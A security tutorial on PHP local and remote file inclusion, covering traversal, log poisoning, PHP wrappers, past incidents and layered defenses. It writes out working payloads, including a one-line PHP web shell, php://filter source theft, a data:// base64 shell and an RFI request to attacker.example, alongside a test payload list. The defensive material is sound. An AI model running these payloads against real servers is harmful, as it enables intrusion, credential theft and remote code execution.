LFI/RFI Explained — How Local/Remote File Inclusion Works, Attack Techniques, and Defenses

File inclusion vulnerabilities let an attacker inject an arbitrary path or URL into a web application's include / require-style call, causing the server-side process to read and execute attacker-controlled content. When the target is a local file on the server it is called LFI (Local File Inclusion); when it is an external URL it is called RFI (Remote File Inclusion). Even pure LFI goes beyond reading /etc/passwd and reaches RCE via log poisoning, /proc/self/environ, and PHP wrappers. RFI lets the attacker directly execute PHP they host on their own HTTP server, so it almost always lands as one-shot RCE. This article covers the essence of LFI/RFI, the relationship with path traversal, concrete attack techniques, famous incidents, and layered defense centered on allowlists and disabling allow_url_include.

What LFI / RFI Are — When "Reading" Turns Into "Executing" #

PHP's include / require functions read the file at the given path and immediately evaluate it as PHP. They've been heavily used for HTML template inclusion and for the classic page-switching router controlled via a URL parameter (?page=about).

When the code is written as include($_GET['page'].'.php') — passing user input straight into the path — the attacker can send page=../../../../etc/passwd%00 or page=http://evil.example/shell. Because include executes any PHP code it finds in the target, a simple "read a file" operation instantly turns into "run arbitrary code". That is the essence of file inclusion vulnerabilities.

▸ What's possible the moment file inclusion lands

Even LFI alone produces realistic threats: disclosure of sensitive files (/etc/passwd, .env, source code, config files), log poisoning that gets executed as PHP, and RCE via PHP wrappers (php://filter, data://). With RFI, the attacker simply has the server include a shell.txt hosted on their own HTTP server, so it is effectively single-step RCE. If SSRF "uses the server's trust boundary as a pivot", file inclusion "hijacks the server's interpreter".

How LFI and RFI differ #

Item	LFI	RFI
Target	A local file on the server	A remote URL (http://, ftp://, etc.)
Prerequisite	Path manipulation is reachable	External URL include is enabled (`allow_url_include=On`)
Direct RCE?	Possible, but usually multi-step (log poisoning / wrappers)	Almost single-shot
Frequency today	Common (CTFs, legacy maintenance)	Rare (PHP 5.2+ defaults to Off)

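PHP 5.2 (2006) introduced the allow_url_include directive with a default of Off. Before that, remote includes were governed only by allow_url_fopen, which defaults to On. RFI today therefore appears only in misconfigured environments. LFI, on the other hand, cannot be killed by configuration because it is a code-level problem, and it is still found regularly.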

Relationship to Path Traversal #

Path traversal (directory traversal) is the technique name for escaping to higher directories using ../. LFI almost always relies on it, but the two are not the same thing: path traversal is the technique, and LFI is what it becomes when the traversed path is fed to include. Path traversal can also be a pure "read-only" issue (e.g., readfile, fopen); when there's no include in the picture, the impact stops at "a file gets read" and doesn't reach RCE. The gap between "read" and "include + execute" is significant.

Why It Exploded in PHP — Historical and Structural Context #

File inclusion is tightly coupled to PHP's language design. The same hole can in theory appear in Java (RequestDispatcher.include), JSP (<jsp:include>), Ruby (load / require), and Python (__import__), but in practice the casualty count in PHP is orders of magnitude higher. Three reasons:

`include` doesn't "read" — it "executes" #

Most languages' file-reading functions return a string. PHP's include / require / include_once / require_once evaluate the content immediately as PHP. Anything outside <?php tags is emitted as raw HTML/text. Meaning: "the attacker controls the file path" = "the attacker controls code execution" is wired into the language itself.

Classic early-2000s code patterns were vulnerable #

CMSes, forum scripts, and DIY PHP sites all loved the "?page=about loads about.php" router.

Mass-produced vulnerable code from the 2000s

<?php
// index.php
$page = $_GET['page'];
include($page . '.php');  // ★ vulnerable to both LFI and RFI

# Attack (LFI: read /etc/passwd; on PHP < 5.3.4 cut .php with NULL byte)
http://victim/index.php?page=../../../../etc/passwd%00

# Attack (RFI: execute attacker's PHP)
http://victim/index.php?page=http://evil.example/shell

The early phpBB / PHP-Nuke family of CMSes and their plugin ecosystems produced this kind of code at scale, and at the time milw0rm (the predecessor of exploit-db) saw a steady stream of new RFI exploits.

Remote includes used to be enabled by default #

Before PHP 5.2 there was no allow_url_include directive at all: remote includes were governed by allow_url_fopen, which defaults to On, so include('http://...') simply worked. PHP 5.2 (2006) added allow_url_include with a default of Off, but lots of CMSes and hosting configurations ran with it switched On for years, which kept RFI a mainstream attack vector through about 2010. Even now there are (usually unintentional) environments with allow_url_include=On.

Why it still doesn't die #

CTFs, HackTheBox, TryHackMe: LFI/RFI is a heavy hitter in web-category problems and continues to be taught as a live technique (EvilBox-One is representative).
Legacy PHP maintenance: Bits of it still live in old WordPress plugins/themes and bespoke CMSes.
Java / Ruby / Python analogues: Not as catastrophic as PHP, but RequestDispatcher.include leaks internal resources, os.path.join traversal leaks .env, and Ruby's render file: produces similar issues.

Major LFI Attack Techniques #

Once LFI lands, the literal capability is "you can read local files". In practice, attackers chain that up to RCE. The standard techniques:

Path traversal to grab sensitive files #

The most basic step. Stack ../ enough times to reach the equivalent absolute path.

Common target files (Linux)

/etc/passwd                       # user list (the standard LFI smoke test)
/etc/shadow                       # readable only if running as root
/etc/hosts                        # internal hostnames
/proc/self/environ                # process env (classic RCE path, see below)
/proc/self/cmdline                # startup command line
/var/log/apache2/access.log       # Apache access log (used for log poisoning)
/var/log/nginx/access.log         # Nginx equivalent
/var/log/auth.log                 # SSH login attempt log
~/.ssh/id_rsa                     # SSH private key
~/.bash_history                   # past commands
/var/www/html/.env                # Laravel/Symfony secrets (DB password etc.)
/var/www/html/config.php          # custom-PHP DB connection info

If the server is Apache + PHP-FPM with web root at /var/www/html/, ../../../../etc/passwd usually hits. If it reads back, LFI is confirmed.

NULL byte (%00) to bypass forced extensions #

Code like include($page.'.php') that forcibly appends an extension on the server side could be cut with a NULL byte on PHP ≤ 5.3.3.

?page=../../../../etc/passwd%00

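This abuses the fact that %00 decodes to a NUL byte, which the C-level file APIs underneath PHP treat as a string terminator, so the appended .php is silently dropped. Patched in PHP 5.3.4 (2010) so modern PHP isn't affected, but legacy 5.2 maintenance and CTFs still feature it.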

Filter evasion (path normalization bypass) #

Even environments that "block ../" can be defeated with notations like:

....//....//etc/passwd          (single ../ removal leaves a remaining "../")
..%2f..%2f..%2fetc%2fpasswd     (URL-encoded)
..%252f..%252fetc%252fpasswd    (double-encoded — exploits double-decoding differences between middleware and app)
..%c0%afetc/passwd              (UTF-8 overlong encoding, older Windows IIS)
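Why the first and third notations work can be reproduced in a few lines. The sketch below is in Python rather than PHP and only models the behavior: naive_strip is a hypothetical stand-in for a filter that deletes "../" in a single pass, and the two unquote calls stand in for a middleware layer and an application that each percent-decode once.

```python
from urllib.parse import unquote


def naive_strip(path: str) -> str:
    """Hypothetical weak filter: delete every literal '../' in one pass."""
    return path.replace("../", "")


# Single-pass removal re-assembles a traversal sequence from the leftovers.
print(naive_strip("....//....//etc/passwd"))

# Double encoding: the first decode yields a string that still looks harmless
# to a filter that searches for '../', the second decode reveals the traversal.
once = unquote("..%252f..%252fetc%252fpasswd")
twice = unquote(once)
print(once)
print(twice)
```

The takeaway for defenders is to canonicalize first and validate the final value, instead of pattern-matching on the raw input.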

Log Poisoning — the classic LFI-to-RCE pipeline #

Once LFI is in place, if you find a text file you can write to, you can drop PHP code there and have include execute it for RCE. The favorite target is the web server's access log.

1. Write PHP into the log

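Send an HTTP request with <?php system($_GET['c']); ?> in the User-Agent. Apache and Nginx write the UA into access.log under the common combined log format. Both escape double quotes, which is why the payload sticks to single quotes.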

2. include the log via LFI

?page=../../../../var/log/apache2/access.log loads the file.

3. include evaluates it as PHP

The <?php ... ?> block inside the log is evaluated. Append &c=id for arbitrary command execution.

4. Upgrade to reverse shell / persistence

Re-plant a bash reverse-shell payload in the UA and connect back to the attacker's listener.

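This requires log files readable by the web process. Stock Debian/Ubuntu Apache logs are typically root:adm 0640 and therefore not readable by www-data, so the attack usually depends on loosened permissions or a non-default setup. A variation targets SSH logs (/var/log/auth.log) by sending ssh '<?php system($_GET["c"]); ?>'@victim so failed-login lines plant the PHP.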
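On the defensive side, poisoned log lines are easy to spot because a PHP open tag has no business appearing in an access log. The following is a minimal Python sketch of that check, not a full log parser. The function name find_poisoned_lines and the two sample lines are made up for illustration.

```python
import re

# Matches '<?php' and the short echo tag '<?='.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def find_poisoned_lines(lines):
    """Return (line_number, line) pairs that contain a PHP open tag."""
    return [
        (number, line)
        for number, line in enumerate(lines, start=1)
        if PHP_TAG.search(line)
    ]


# Made-up sample lines in combined log format.
sample = [
    '203.0.113.5 - - [01/Jan/2024:00:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:00:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'c\']); ?>"',
]

for number, line in find_poisoned_lines(sample):
    print(number, line)
```

A hit does not prove exploitation, since the log still has to be includable, but it is a strong sign that someone is probing for LFI.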

/proc/self/environ pathway #

The Linux file /proc/self/environ is a virtual file returning the current process's environment variables as a string. In many old SAPI configurations (CGI / mod_php), the HTTP User-Agent ends up as an environment variable, so just putting PHP into the UA and reading /proc/self/environ via LFI executes it.

GET /index.php?page=../../../../proc/self/environ HTTP/1.1
User-Agent: <?php system($_GET['c']); ?>

Under PHP-FPM and other modern setups, the UA often doesn't end up in environ directly, so it's getting less effective — but it remains a CTF staple.

Session file pathway #

PHP sessions are stored at paths like /var/lib/php/sessions/sess_<SESSIONID>. If a user-controlled field (e.g., a username) ends up in a session variable, the attacker writes PHP into the session file and includes it via LFI.

PHP Wrappers — Levelling Up LFI #

PHP has a stream wrapper mechanism that transparently opens files/streams via schemes like file://, http://, php://, data://, expect://. include honors these too, which expands LFI into a wide variety of attacks.

php://filter — leaking source as Base64 #

php://filter is a wrapper that reads files without executing them, optionally encoding them as Base64. The standard way to steal PHP source via LFI.

Source theft via php://filter

curl "http://victim/index.php?page=php://filter/convert.base64-encode/resource=config"
# Response contains base64-encoded config.php
# → decode to reveal DB credentials, API keys, etc.

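# Filters can be chained (ROT13, zlib compression, etc.); they are applied left to right,
# so compress first and Base64-encode last to keep the output printable
curl "http://victim/?page=php://filter/read=zlib.deflate|convert.base64-encode/resource=index"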

Normally, trying to read index.php via LFI executes it and you see nothing. Wrapping it through a filter is the trick that exposes the raw source.
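What comes back from such a request is an encoded blob, not source, so it has to be reversed before it is readable. The Python sketch below shows the reversal under two assumptions: the Base64 step was applied last, and any deflate step is raw DEFLATE (RFC 1951, no zlib header). The helper name decode_filter_output and the sample source string are hypothetical, and the blobs are generated locally, not fetched from a server.

```python
import base64
import zlib


def decode_filter_output(blob: str, deflated: bool = False) -> str:
    """Undo base64 (and optionally raw DEFLATE) applied by a filter chain."""
    raw = base64.b64decode(blob)
    if deflated:
        # wbits=-15 selects raw DEFLATE without a zlib header.
        raw = zlib.decompress(raw, wbits=-15)
    return raw.decode("utf-8", errors="replace")


# Build sample blobs locally to stand in for a server response.
source = "<?php $db_password = 'example'; ?>"
plain_blob = base64.b64encode(source.encode()).decode()

compressor = zlib.compressobj(wbits=-15)
deflated_bytes = compressor.compress(source.encode()) + compressor.flush()
deflated_blob = base64.b64encode(deflated_bytes).decode()

print(decode_filter_output(plain_blob))
print(decode_filter_output(deflated_blob, deflated=True))
```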

data:// — code directly inside the URL #

data://text/plain;base64,... embeds Base64-encoded PHP inside the URL and feeds it to include. Unlike RFI it requires no outbound HTTP, only allow_url_include=On.

?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
   (decoded: <?php system($_GET['c']); ?>)
&c=id

expect:// — direct command execution #

In environments with PHP's expect extension installed, just writing expect://id runs the command. Not installed by default so it's rare in the wild, but where present, LFI is one-step RCE.

phar:// — RCE via deserialization #

Through PHP 7.x, the phar:// wrapper automatically deserializes the metadata of Phar archives. If LFI can point at an attacker-uploaded .phar (which can be disguised as an image by spoofing magic bytes) via phar://uploads/avatar.jpg/x, the metadata gets deserialized — and if any class with __wakeup() / __destruct() is reachable, gadget chaining produces RCE (Object Injection). Behavior changed in PHP 8.0 to mitigate this, but the attack is still alive in legacy environments.

zip:// and compress.zlib:// #

zip:// lets you include files inside zip archives directly. The technique is to upload a zip via the image upload feature and run ?page=zip://uploads/img.jpg%23shell to execute shell.php inside it.

RFI Patterns and When It Still Appears #

When the precondition (allow_url_include=On or equivalent) is in place, RFI is the simplest possible attack.

Minimal payload #

Minimal RFI

# Host this on your HTTP server (use .txt extension — .php would be executed on YOUR server)
# http://attacker.example/shell.txt
<?php system($_GET['c']); ?>

# Attack URL
curl "http://victim/index.php?page=http://attacker.example/shell.txt&c=id"   # victim executes

Why the `.txt` extension #

If your attacker server is configured to run PHP, a file named shell.php would be executed on your own server and the victim would receive only its output (an empty string). To deliver raw PHP source to the victim, the attacker's server must use an extension that won't be executed, such as .txt.

When RFI still happens today #

allow_url_include=On (default since PHP 5.2 is Off)
The application allows external URLs to be passed to include / require
Or the data:// wrapper is reachable (only allow_url_include=On needed)
Some frameworks / template engines do equivalent operations internally

Note that data:// requires no outbound HTTP, so RFI lands even with strict egress filtering.

Analogues in Java / Ruby / Python #

Language / FW	Equivalent feature	Risk
Java (JSP)	`<jsp:include page="...">` directly bound to user input	Usually limited to servlet-container resources, but configurations can let it fetch external URLs
Ruby (Rails)	`render file: params[:p]` / `send_file params[:p]`	Classic local file disclosure. Rails 5+ disallows external paths for `render file:` by default
Python (Flask)	`render_template(user_input)` with user-controlled template name	Can expose unintended templates; becomes Server-Side Template Injection (SSTI) when input reaches `render_template_string`
Node.js (Express)	`res.render(req.query.view)`	Same — template name from input

Without PHP's "read = execute" language design, these are less likely to be direct RCE, but they still produce sensitive-file leaks or RCE via SSTI.

Notable File Inclusion Incidents #

The early-2000s PHP CMS golden age #

phpBB, PHP-Nuke, PostNuke, Mambo, early Joomla, and osCommerce: old OSS CMSes and their plugins shipped RFI bugs all over the place. milw0rm / exploit-db saw a steady stream of new RFI exploits, and automated scanners compromised vulnerable installs at scale. They underpinned web defacement campaigns and the early botnet eras.

EvilBox-One (CTF, 2021) #

A well-known LFI intro machine on VulnHub / HackTheBox-style platforms. The avatar-display feature has an LFI in a URL parameter, and the canonical path is /etc/passwd → id_rsa → SSH → privesc — a textbook "how far can you go from LFI alone" scenario. Our site also covers a writeup of it; it's one of the best lab boxes to internalize the typical LFI exploitation flow.

CVE-2018-1000861 (Jenkins, Stapler) #

Jenkins's Stapler web framework allowed "invoking arbitrary methods on a class via dynamic routing", escalating into multi-stage LFI/SSRF/RCE chains. Not pure file inclusion, but a good reference for the "a filename/path becomes a reflection entry point" extended-family pattern.

CVE-2021-41773 / CVE-2021-42013 (Apache 2.4.49 / 2.4.50) #

Strictly, this is a path-normalization flaw in Apache httpd's own URL handling rather than an include bug, but with mod_cgi enabled it leads directly from /etc/passwd disclosure to RCE. It is a leading example of the "LFI/path-traversal that ends at RCE without going through include" pattern, which applies when the path reaches an executable. Massive scanning waves hit Apache servers worldwide the day it dropped.

Repeated WordPress plugin incidents #

Among WordPress's tens of thousands of plugins, sloppy implementations of AJAX endpoints, file manager features, and theme customizers periodically expose file inclusion-class bugs. Example: wp-file-manager (CVE-2020-25213) is technically arbitrary file upload, but the nearby CVE space is full of LFI-flavored issues. "LFI/RFI is a classic that's extinct" is a misconception — at the ecosystem edges, they are still found in everyday operations.

Lessons #

Just not handing user input to PHP's include would have prevented the vast majority of the historical damage.
An allowlist (a fixed list of allowed page names) makes the entire attack surface vanish.
LFI alone is dangerous, but combined with logs / sessions / PHP wrappers it reaches RCE-class severity.
Path traversal also appears at the web-server level (the Apache example). Beyond the application, keeping middleware safely patched matters.

Defenses — Layered Defense #

Just like XSS and SSRF, file inclusion cannot be reliably stopped by any single control. Combine allowlists, disabling allow_url_include, canonicalization, least privilege, and WAF.

Filename allowlists — top priority #

"Don't bind user input to a path" is the only root cure. Use a fixed list of allowed page names and reject everything else.

PHP — the correct allowlist pattern

<?php
$allowed = ['home', 'about', 'contact', 'pricing'];
$page = $_GET['page'] ?? 'home';
if (!in_array($page, $allowed, true)) {
    http_response_code(404);
    exit;
}

// ★ Don't concat raw user input into a path. Use only values that passed in_array.
include __DIR__ . '/pages/' . $page . '.php';

Key points:

Enumerate allowed values in code (or DB — same idea).
Always pass true as the third argument to in_array($page, $allowed, true) (strict comparison). Without it PHP compares loosely, and on PHP < 8 an allowlist entry such as the integer 0 matches any non-numeric string (0 == 'evil' is true).
Only after passing comparison is the value allowed near the path.
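The same idea carries over to the non-PHP stacks mentioned earlier. Below is a minimal Python sketch in which the request value is only ever used as a dictionary key, so it never becomes part of a path. PAGES_DIR, ALLOWED_PAGES, and resolve_page are hypothetical names chosen for illustration, and the directory is an assumption.

```python
from pathlib import Path
from typing import Optional

# Hypothetical template directory; adjust to the real application layout.
PAGES_DIR = Path("/var/www/app/pages")

# Fixed mapping from public page names to files chosen by the developer.
ALLOWED_PAGES = {
    "home": PAGES_DIR / "home.html",
    "about": PAGES_DIR / "about.html",
    "contact": PAGES_DIR / "contact.html",
    "pricing": PAGES_DIR / "pricing.html",
}


def resolve_page(requested: object) -> Optional[Path]:
    """Return the file for an allowed page name, or None for anything else."""
    if not isinstance(requested, str):
        return None
    return ALLOWED_PAGES.get(requested)


print(resolve_page("about"))
print(resolve_page("../../etc/passwd"))
```

Because the lookup is an exact key match, there is no comparison mode to get wrong and no string concatenation for a traversal sequence to ride on.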

Disable `allow_url_include` / `allow_url_fopen` #

In php.ini:

allow_url_include = Off
allow_url_fopen   = Off    ; if you need it, switch to curl/Guzzle case by case

allow_url_include=Off alone effectively kills both RFI and data://-based attacks. allow_url_fopen also affects file_get_contents('http://...') etc., so if the app needs external URL fetches, migrate them to curl/Guzzle first, then turn it off.

Path-traversal hardening — `realpath` + prefix check #

If you really must use user input in a path, use realpath to resolve symlinks and ../ into a canonical absolute path, then confirm it's prefixed by an allowed directory.

PHP — lock down using realpath

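<?php
$baseDir = realpath(__DIR__ . '/pages');
$page    = $_GET['page'] ?? '';
// Reject arrays (?page[]=x) before building the path.
$target  = is_string($page) ? realpath($baseDir . '/' . $page . '.php') : false;
// realpath returns false for missing paths; the prefix check blocks escapes from $baseDir.
if ($baseDir === false || $target === false
    || strpos($target, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    exit;
}

include $target;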

realpath resolves ../ and returns false if the result doesn't exist. The follow-up strpos check confirms the canonical path starts with the allowed directory, blocking escape.
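For comparison, here is a sketch of the same canonicalize-then-check pattern in Python, using os.path.realpath and os.path.commonpath. The function name resolve_inside and the .html suffix are assumptions for the example, and the demo builds its own temporary directory instead of touching real paths.

```python
import os
import tempfile
from typing import Optional


def resolve_inside(base_dir: str, user_value: str) -> Optional[str]:
    """Return the canonical path for user_value if it stays inside base_dir."""
    if "\x00" in user_value:
        return None
    base = os.path.realpath(base_dir)
    # realpath resolves '..' segments and symlinks before the containment check.
    target = os.path.realpath(os.path.join(base, user_value + ".html"))
    if os.path.commonpath([base, target]) != base:
        return None
    if not os.path.isfile(target):
        return None
    return target


with tempfile.TemporaryDirectory() as root:
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "about.html"), "w") as handle:
        handle.write("about")
    with open(os.path.join(root, "secret.html"), "w") as handle:
        handle.write("secret")

    print(resolve_inside(pages, "about") is not None)  # inside the base directory
    print(resolve_inside(pages, "../secret"))          # escapes the base directory
```

Comparing whole path components with commonpath avoids the classic prefix mistake where /var/www/pages_old passes a plain string check against /var/www/pages.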

`open_basedir` — physical sandbox #

Setting PHP's open_basedir in php.ini or vhost config physically restricts which directories the PHP process can access.

open_basedir = /var/www/html:/tmp

This alone blocks PHP-level access to /etc/passwd and /proc/self/environ. It is not a complete isolation, so it doesn't replace allowlists — treat it as another layer.

Lock extension and directory #

Combine "force .php as the suffix" and "lock the directory". NULL byte bypass has been closed since PHP 5.3.4, but it's safer to structurally prevent the user from controlling extensions in the first place.

Make logs unreadable by the web process #

To defang log poisoning, set permissions on access.log / auth.log so the web server user (www-data / nginx / apache) cannot read them. Standard Debian/Ubuntu installations often use root:adm 0640, which www-data can't read — but an accidental o+r opens the hole.
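An accidental o+r is simple to audit for. The following Python sketch checks only the "other" read bit on a list of log paths. The function names are hypothetical, the paths are the ones mentioned in this article, and a POSIX permission model is assumed.

```python
import os
import stat


def world_readable(path: str) -> bool:
    """True if the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_logs(paths):
    """Return the subset of paths that any local user can read."""
    findings = []
    for path in paths:
        try:
            if world_readable(path):
                findings.append(path)
        except OSError:
            # Missing file or no permission to stat it: nothing to report.
            continue
    return findings


print(audit_logs(["/var/log/apache2/access.log", "/var/log/auth.log"]))
```

This does not cover access granted through group membership (for example a web user added to adm), so it complements a review of the web user's groups and does not replace one.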

WAF and input validation #

WAFs (ModSecurity, AWS WAF, Cloudflare) can block requests containing literals like ../, php://filter, or data://. Not a root cure (URL encoding and double encoding can bypass), but useful as a speed bump during allowlist rollouts and against unknown plugin vulnerabilities.

Least privilege — the last line of defense #

Don't run the web process as root, keep read/write to the minimum directories needed, and separate the SSH-key-holding user from the web user. These alone shrink LFI impact by orders of magnitude.

Testing and Detection #

Manual test playbook #

Hit every place that takes a filename, template name, page name, theme name, or locale name.

Representative test payloads

# 1. Smoke-test with /etc/passwd
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252fetc%252fpasswd
# 2. Steal source with PHP wrappers
?page=php://filter/convert.base64-encode/resource=index
?page=php://filter/convert.base64-encode/resource=config
# 3. data:// for direct PHP exec (needs allow_url_include=On)
?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
# 4. RFI
?page=http://attacker.example/shell.txt
# 5. NULL byte on legacy
?page=../../../../etc/passwd%00

# 6. Log poisoning (PHP in UA, then LFI on the log)
User-Agent: <?php system($_GET['c']); ?>
?page=../../../../var/log/apache2/access.log&c=id

Automation tooling #

LFISuite / fimap — LFI detection and auto-exploitation (covers log poisoning, PHP wrappers, RFI)
Burp Suite Intruder — fan out encoding variations in parallel
ffuf / wfuzz — brute force payloads via the FUZZ placeholder
Nuclei — template-based vulnerability scanning; many LFI templates

Static analysis #

Trace "user input → include / require / readfile / file_get_contents data flow". Semgrep / SonarQube / PHPStan-Security have rules for it. Even a one-shot grep:

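grep -rnE '(include|require)(_once)?\s*\(?\s*\$_' --include='*.php' .

catches the most blatant cases, where a superglobal is passed straight to include / require (with or without parentheses). It misses input that is first copied into a variable, as in the $page router example earlier, so it is a starting point and not a substitute for data-flow analysis. In code review, the first thing to check is whether $_GET / $_POST / $_REQUEST / $_COOKIE / $_SERVER reaches the argument of include / require.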
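A slightly broader heuristic is to flag every include / require whose argument contains any variable and leave the judgment to a human reviewer. The sketch below does that line by line in Python. It is a rough illustration only: it does no real parsing or taint tracking, it ignores multi-line statements, and the names INCLUDE_STMT and risky_includes are hypothetical.

```python
import re

# include/require (optionally _once), optional '(', then everything up to ';'.
# The lookbehind avoids matching variables such as $include.
INCLUDE_STMT = re.compile(
    r"(?<![\w$])(?:include|require)(?:_once)?\b\s*\(?\s*(?P<arg>[^;]*);",
    re.IGNORECASE,
)


def risky_includes(php_source: str):
    """Return (line_number, line) for include/require statements using a variable."""
    findings = []
    for number, line in enumerate(php_source.splitlines(), start=1):
        match = INCLUDE_STMT.search(line)
        if match and "$" in match.group("arg"):
            findings.append((number, line.strip()))
    return findings


sample = """<?php
$page = $_GET['page'];
include($page . '.php');
require_once 'config.php';
include $_GET['tpl'];
"""

for number, line in risky_includes(sample):
    print(number, line)
```

This will also flag safe code that builds a path from an allowlisted variable, which is acceptable for a review queue but too noisy for a blocking CI gate.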

Production monitoring #

Alert on literal/encoded ../, php://, data://, %00 in WAF / access logs
Block + notify when sensitive paths like /etc/passwd appear in URLs
Treat sudden bursts of 404 / 403 on filename parameters as a scanner signature
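The first two rules can be prototyped in a few lines before being translated into WAF or SIEM syntax. The Python sketch below percent-decodes a request URI a bounded number of times and then looks for the markers listed above. The pattern list, the three-round limit, and the names normalize and is_suspicious are illustrative assumptions, not a complete signature set.

```python
import re
from urllib.parse import unquote

SUSPICIOUS = re.compile(
    r"(\.\./|\.\.\\|php://|data://|expect://|phar://|zip://|\x00"
    r"|/etc/passwd|/proc/self/)",
    re.IGNORECASE,
)


def normalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(request_uri: str) -> bool:
    """True if the decoded URI contains a file-inclusion marker."""
    return bool(SUSPICIOUS.search(normalize(request_uri)))


print(is_suspicious("/index.php?page=about"))
print(is_suspicious("/index.php?page=..%252f..%252fetc%252fpasswd"))
```

Expect false positives on applications that legitimately carry URLs or relative paths in parameters, so alerts like this work best scoped to the parameters that feed file or template names.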

Related Attacks #

Attack	Relationship
Path Traversal	A subset technique used by LFI. Often refers to read-only cases that don't reach RCE
Arbitrary File Upload	When the upload destination path is predictable, combine with LFI to reach RCE (the "PHP hidden in an image" trick)
SSRF	Similar to RFI in that "the server fetches an attacker-supplied URL", but SSRF is a general HTTP-client problem. RFI specifically lands as execution through `include`
SSTI (Server-Side Template Injection)	User input ends up as a template name or template content and is evaluated as the template engine's syntax. Cousin to file inclusion in origin
PHP Object Injection	User input flows into `unserialize` and reaches `__wakeup`/`__destruct`-based RCE. The `phar://` wrapper bridges from LFI
Log Injection	Combines with LFI to evolve into log poisoning. The class of bugs that injects CRLF into logs

Summary — 6 things developers must internalize #

File inclusion is the classic of classics, yet it remains a live threat at the PHP-ecosystem edge and in CTF / training. PHP's include-style "read = execute" semantics are convenient, but they have the property that the moment user input lands in a path, the bug is RCE-class.

▸ 6 things developers must internalize

Don't pass user input directly to include / require. Enumerate allowed page names in code and compare with in_array($v, $allowed, true)
Set allow_url_include = Off / allow_url_fopen = Off in php.ini (wipes out RFI and data://)
If path manipulation is truly necessary, canonicalize with realpath and do a prefix check against the allowed directory
Use open_basedir for a physical sandbox; run the web process with least privilege
Make log files unreadable by the web process (log-poisoning defense)
Have the WAF detect ../ / php://filter / data:// / %00 — but treat it as one layer in defense-in-depth, with allowlists as the root

The instinct "filenames are safe to take from outside" is the most dangerous one. In PHP, a path is code, and designs must explicitly forbid it from being something the outside world can touch.